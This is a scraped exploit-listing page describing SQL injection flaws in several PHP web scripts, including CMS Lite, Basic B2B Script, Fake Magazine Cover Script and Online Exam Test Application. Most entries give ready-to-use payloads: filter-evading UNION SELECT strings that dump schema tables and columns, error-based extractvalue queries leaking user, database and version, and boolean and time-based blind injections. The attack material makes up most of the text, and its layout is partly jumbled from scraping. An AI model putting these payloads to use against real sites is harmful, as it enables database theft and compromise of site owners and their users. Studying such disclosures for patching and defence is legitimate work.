Exploits 3163 - exploit.company

The vulnerability allows an attacker to inject sql commands into the vulnerable parameter of the application. Proof of Concept examples are provided in the text.

9,8

CVSS

CRITICAL

SQL Injection

CWE

Product Name

News Magazine & Blog CMS

Platforms Tested

WiN7_x64/KaLiLinuX_x64

Affected Version

MyMagazine Magazine & Blog CMS 1.0 – SQL Injection

The vulnerability allows an attacker to inject sql commands. Proof of Concept examples are provided in the text.

WiN7_x64/KaLiLinuX_x64

Affected Version

Creative Management System – CMS Lite 1.4 – SQL Injection

The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/index.php?S=[SQL] '+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x3a,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()))),0)--+- Parameter: S (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: S=BeDark' AND 7998=7998 AND 'QNRN'='QNRN Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: S=BeDark' AND SLEEP(5) AND 'DmYc'='DmYc

Creative Management System - CMS Lite

Platforms Tested

WiN7_x64/KaLiLinuX_x64

Affected Version

Basic B2B Script – SQL Injection

The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/product_view1.php?pid=[SQL] -19'++/*!03333UNION*/+/*!03333SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,(/*!03333Select*/+export_set(5,@:=0,(/*!03333select*/+count(*)/*!03333from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!03333table_name*/,0x3c6c693e,2),/*!03333column_name*/,0xa3a,2)),@,2)),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37--+- http://localhost/[PATH]/productcompanyinfo.php?id=[SQL] Parameter: pid (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: pid=19' AND SLEEP(5) AND 'zgOs'='zgOs Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=309' AND 2824=2824 AND 'AWCd'='AWCd Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id=309' AND SLEEP(5) AND 'BTCw'='BTCw

WiN7_x64/KaLiLinuX_x64

Affected Version

CPA Lead Reward Script – SQL Injection

The vulnerability allows an attacker to inject sql commands into the vulnerable parameter of the application.

CPA Lead Reward Script

Platforms Tested

WiN7_x64/KaLiLinuX_x64

Affected Version

Fake Magazine Cover Script – SQL Injection

The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/rate.php?value=[SQL] -1047+/*!00005UniOn*/+/*!00005SelEct*/+CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),2--+- http://localhost/[PATH]/content.php?id=[SQL] -237+/*!00005UNION*/+/*!00005SELECT*/+1,2,3,4,5,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),7,8,9,10,11,12,13--+- Parameter: value (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: value=1047 AND 6465=6465 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: value=1047 AND SLEEP(5) Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=237 AND 1343=1343 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id=237 AND SLEEP(5)

Fake Magazine Cover Script

Platforms Tested

WiN7_x64/KaLiLinuX_x64

Affected Version

http://www.nicephpscripts.com/

Nice PHP FAQ Script – SQL Injection

The vulnerability allows an attacker to inject sql commands. An example of the exploit is http://localhost/[PATH]/index.php?nice_theme=[SQL] with a payload of nice_theme=3 AND 5083=5083

PHP FAQ Script - Knowledgebase Script

Platforms Tested

WiN7_x64/KaLiLinuX_x64

Affected Version

http://www.phpscriptsmall.com/

Online Exam Test Application – SQL Injection

The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/resources.php?action=category&sort=[SQL] -8++/*!07777UNION*/+/*!07777SELECT*/+0x31,0x32,0x496873616e2053656e63616e,(/*!07777Select*/+export_set(5,@:=0,(/*!07777select*/+count(*)/*!07777from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!07777table_name*/,0x3c6c693e,2),/*!07777column_name*/,0xa3a,2)),@,2))--+- Parameter: sort (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: action=category&sort=8 AND 5525=5525 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: action=category&sort=8 AND SLEEP(5) Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: action=category&sort=8 UNION ALL SELECT NULL,NULL,CONCAT(0x7176707a71,0x77654f6a51797a6c7755546b54574f68467842734c4268517654667a6e584e63634871574f4f454e,0x716b766a71),NULL-- Yhyw

Online Exam Test Application

Platforms Tested

WiN7_x64/KaLiLinuX_x64

Affected Version

From:

N/A